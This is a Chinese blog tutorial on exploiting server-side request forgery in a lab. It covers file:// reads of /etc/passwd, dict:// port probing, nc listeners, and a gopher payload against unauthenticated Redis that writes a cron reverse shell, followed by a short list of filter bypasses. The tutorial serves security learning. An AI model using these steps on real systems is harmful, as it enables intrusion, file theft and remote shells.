ssrf 过滤.php,SSRF详细利用方式及getshell

最新推荐文章于 2024-04-14 16:57:00 发布
最新推荐文章于 2024-04-14 16:57:00 发布
阅读量536 收藏
点赞数

本文将分为三个部分讲解0x01 ssrf本地远程及其他验证漏洞方式0x02 ssrf利用redis未授权getshell0x03 ssrf常见的绕过方式

0x01 ssrf本地及远程验证方式重新复现一下 顺便复习一下curl和监听端口的命令

无回显的ssrf验证本地开启apache服务

8a478e696cfdc216fc5668f3a39c7553.png

在存在ssrf处访问http://10.1.1.200(本机服务地址)查看kali机器服务器日志信息:

tail -f /var/log/apache2/access.log

327c4e21551c00f3c8faa0f9992f1eff.png

48a0de94051d6d45e55cb29e12e59b8e.png

打开日志发现被访问了,确定存在ssrf漏洞无回显还可以使用burp的collaborator来进行尝试或者dnslog

利用tcpdump测试:

Kali机器打开一个终端,使用tcpdump抓包:

#tcpdump -nne -i eth0 port 6666

-nne:不把端口和网络地址转换成名称,在输出行打印数据链路层的头部信息;-i:监视指定网络接口的数据包。

17da9e5cb9b97f8ee8e35423c6caee6c.png

访问http://10.1.1.200:6666

ec6b672364fe73ae7fa5eb36d78331d8.png

可以看箭头处,成功由本地访问到,确定存在ssrf漏洞

通过dict协议获取服务器端口运行的服务1.本地利用:本机机器中在终端输入:

curl -v 'dict://127.0.0.1:22'

curl:一种命令行工具,作用是发出网络请求,获取数据;curl -v:显示HTTP通信的整个过程,包括端口连接和HTTP request头信息。

fab2e35b975ad2d82a6e5a01dd01410a.png

可以看到ssh版本号为2.0 debian-6版本

2.远程利用:在存在ssrf地方输入

dict://127.0.0.1:22

06e8ea0ee0b827ecfc48bc4441caba43.png

利用技巧:可以通过Burp爆破看对方开启了什么服务

通过file协议访问计算机中的任意文件1.本地利用:在终端输入

curl -v 'file:///etc/passwd'

f3e29435c6e84943584c2bfc09c0fa92.png

2.远程利用:在存在ssrf地方输入

file:///etc/passwd

961ac919eca46f790e5925cc21281c4d.png

sftp及tftp协议在SSRF中的作用

1.sftp代表SSH文件传输协议,通过sftp协议获取SSH相关信息:

Kali机器上输入:nc -lvp 1234

-l:监听入站信息;-p:设置本地主机使用的通信端口;-v:显示指令执行过程。

在存在SSRF处输入:sftp://10.1.1.200:1234,点击‘TEST IT’后查看响应信息:

1da52395387ff28639c9d6ceb8b9893b.png

2.tftp即简单文件传输协议,允许客户端从远程主机获取文件:

Kali机器上输入:nc -lvup 6666

-u:使用UDP传输协议。

在SSRF处输入:tftp://10.1.1.200:6666

点击后查看响应信息:

c2a8bfd0af3edd042efe5d22d40d3311.png

0x02ssrf利用redis未授权getshell

通过gopher协议攻击Redis,如果内网中的Redis存在未授权访问漏洞,当Redis服务以root权限运行时,利用gopher协议攻击内网中的Redis,通过写入定时任务可以实现反弹shell

1.首先开启centos下redis服务

# cd /usr/local/bin

# ./redis-server /root/redis-5.0.4/redis.conf

847eb15ae54c22aeffc1f9159f0c966d.png

2.在kali上开启redis服务

cd /usr/redis/

./redis-server

b5352b2da7f9248071930a1bdb5eb2bb.png

另外开启一个终端,测试启动:./redis-cli ping

fae5bc49952e552eae85bee09d971d6a.png

启动成功

4.在kali机器写一个redis反弹shell的bash脚本:

0fe8f64b261bb183a8c0b109515deeca.png

在Redis的第0个数据库中添加key为1,名为root的定时任务,value字段最后会多一个n是因为echo重定向最后会自带一个换行符,位置为CentOS机器的/var/spool/cron/,10.1.1.200为获取反弹shell的本地IP地址,666为反弹shell的监听端口,可随意设置。

5.Kali机器另外开启一个终端,使用socat进行端口转发,获取Redis攻击的TCP数据包:

# socat -v tcp-listen:2333,fork tcp-connect:127.0.0.1:6379

将本地的2333端口转发到Redis服务器的6379端口,访问本地的2333端口其实是访问Redis服务器的6379端口。

881b5c267cf2e6d7ac4f87c06ce0aa24.png

执行脚本

bash shell.sh 127.0.0.1 2333

获取到数据

9ef149fa838df667831fa32df934b81e.png

6.先将socat获取的数据保存为socat.log文件,利用脚本将数据转换成适配于gopher协议的URL。

7be49cd34e76f7cf1f7480c21a11ed94.png

7.在kali上监听端口

nv -lvvp 666

14367c4c21a47d59aa56341fc89470d0.png

8.攻击CentOS机器的Redis服务:

在SSRF处输入gopher://IP:端口/_payload:

gopher://127.0.0.1:6379/_转换的数据内容:

dea942380c77f6bf4762872288f4063d.png

成功反弹shell

0x03 ssrf常见的绕过方式

IP地址转换进制

添加端口

利用短地址进行302跳转(如192.168.1.1.xip.ip会自动重定向到192.168.1.1)

利用句号

还有很多绕过方式

暂时总结到这里吧

果妈说
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网安知识系列:SSRF漏洞中绕过IP限制的几种方法总结
weixin_54626591的博客
04-21 282
SSRF漏洞中绕过IP限制的几种方法总结
CtfHub ssrf 文件上传
qq_51553814的博客
08-22 1496
CtfHub ssrf 文件上传 原理 与CtfHub ssrf Post请求类似,文件上传同样是发出Post请求,只不过Post请求报文中包含有我们的shell文件,关于ssrf post请求在另一篇有解释ssrf post请求 解题 同样,显示访问内网的flag.php文件,也就是url=127.0.0.1/flag.php,可以看到允许文件上传 也是通过file协议看一下flag.php的源码 如上图所示,后端只允许我们通过内网方式上传文件,如果我们通过上面的文件上传,相当于是从我们本地将文件传
利用ssrf上传文件到服务器,4.4. SSRF
weixin_34413579的博客
08-02 165
4.4.4. 过滤绕过¶4.4.4.1. 更改IP地址写法¶一些开发者会通过对传过来的URL参数行正则匹配的方式过滤内网IP,如采用如下正则表达式:^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$^192\....
ssrf 过滤.php,[CTFSHOW]SSRF
weixin_33359523的博客
03-22 332
文章目录web351首先代码审计,简简单单的使用php的curl,发现没有过滤,尝试读取本地文件error_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$ch=curl_init($url);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTR...
Weblogic SSRF 到Getshell
干铮的博客
01-29 590
Weblogic SSRF漏洞 描述:Weblogic中存在SSRF漏洞,利用该漏洞可以任意HTTP请求,而攻击内网redis/fastcgi等脆弱组件。 1.环境搭建 环境采用vulhub的docker环境 启动环境路径 vulhub/weblogic/ssrf 启动环境命令 docker-compose build docker-compose up -d 访问http://your-ip:7001/uddiexplorer/ 无需登录即可查看uddiexploer应用 2.S..
实战getshell新姿势-SSRF漏洞利用与getshell实战
qq_43665434的博客
03-28 1344
实战getshell新姿势-SSRF漏洞利用与getshell实战 一、什么地方最容易出现SSRF二、SSRF漏洞危害三、SSRF 神器 Curl 的使用 四、最常用的跳转绕过五、Python + SSRF 实现端口扫描1. 简单的端口扫描2. 同时观察 Wireshark 整个扫描流程3. 代码实现4. 验证本地是否开启了相应的端口5. Python 代码编写的思路:端口存在连接会一直在连接,连接时间会很长端口不存在的连接会被立马刷新 六、利用 Discuz 的 SSRF 漏洞 .
SSRF bible. Cheatsheet
08-06
SSRF bible. Cheatsheet SSRF attack and sockets presentation.
你未见过的SSRF利用方式
06-20
Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解⼀个ssrf的...
红蓝对抗中的SSRF深入利用实战.pdf
08-11
安全趋势 概述 SSRF简介 利用现状 利用困境 实战分享 Case 1 Case 2 Case 3
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
第三节 SSRF利用 - 内网资源访问-01
09-15
"第三节 SSRF利用 - 内网资源访问-01" 本节课程主要讲解了SSRF漏洞的_php_函数,包括file_get_contents、fsockopen()和curl_exec()三个函数的使用和可能存在的漏洞。 SSRF漏洞的定义 SSRF漏洞全称为Server-side ...
SSRF02】服务器端请求伪造——WebLogic架构漏洞复现之从SSRF==>未授权访问==>GetShell
Fighting_hawk的博客
03-16 4051
1. 掌握SSRF漏洞挖掘的方法; 2. 掌握利用SSRF漏洞内网扫描; 3. 本实验中未涉及SSRF利用时绕过的方法; 4. 后续将研究如何成功反弹shell
ssrf 过滤.php,SSRF技巧之如何绕过filter_var( )
weixin_42478292的博客
03-22 413
0x00 前言前几天我读了两篇非常棒的论文:第一篇是发表在blackhat.com上的“A New Era of SSRF ”,讲述的是不同编程语言的SSRF问题;第二篇是由Positive Technology发表的一篇名为“PHP Wrapper” 的论文,它主要讲述的是如何以多种不同的方式使用PHP Wrapper来绕过过滤器以及受过滤的输入(您可以在结尾处找到这两个链接)。在本文中,我将深...
ctfhub ssrf之上传文件
L_2448570135的博客
03-13 506
CTFHUB之ssrf中文件上传的题目内容,记录自己遇到的问题
SSRF+Redis未授权getshell
最新发布
yuan_boss的博客
04-14 1160
当一个网站具有ssrf漏洞,如果没有一些过滤措施,比如没过滤file协议,gophere协议,dict等协议,就会导致无法访问的内网服务器信息泄露,甚至可以让攻击者拿下内网服务器权限。
挖洞经验:通过Vimeo的文件上传功能发现其SSRF漏洞
墨痕诉清风的博客
03-09 571
比如,按以上原理,如果我的VPS告诉Vimeo后端服务器,我需要上传的文件有500B,那么Vimeo后端服务器就会来取走这500B,但是,如果现在我的VPS告诉Vimeo后端服务器我的文件只有200B,那么之后会发生什么呢?于是,我就直接想测试一下Vimeo平台的上传功能,尤其是通过Google云端硬盘 (Google Drive)上传到Vimeo的一些功能特性,所以,在我的Google云端硬盘中我选择了一个特定视频文件,把它执行到Vimeo的上传操作,然后用BurpSuite查看它的具体上传请求信息。..
Web渗透测试之SSRF攻击:绕过SSRF过滤
vodkaDL的博客
03-09 2850
文章目录前言 前言
ssrf redis getshell 写私钥_SSRF 漏洞记录
weixin_39752880的博客
11-22 485
0x00:漏洞原理SSRF(Server-Side Request Forgery)也属于应用层上的一个漏洞类型,用一个最简单的例子来理解这个漏洞:比如一个添加图文的功能,填入标题内容和封面图然后提交在网站前台显示,对于这个功能的图片它除了可以让你上传以外,还支持填入远程图片地址,如果你填入了远程的图片地址,则该网站会加载远程图过来行显示,而如果程序写法不严谨或者过滤不严格,则加载图片...
SSRF参考测试文件(英文版)
10-13
这份文档旨在帮助读者理解SSRF的基本概念、其潜在问题以及如何利用行攻击,同时提供了案例研究和安全防御措施。 首先,文章从SSRF的定义开始,指出这是一种利用服务器的网络能力,通过发送请求到非预期的外部或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值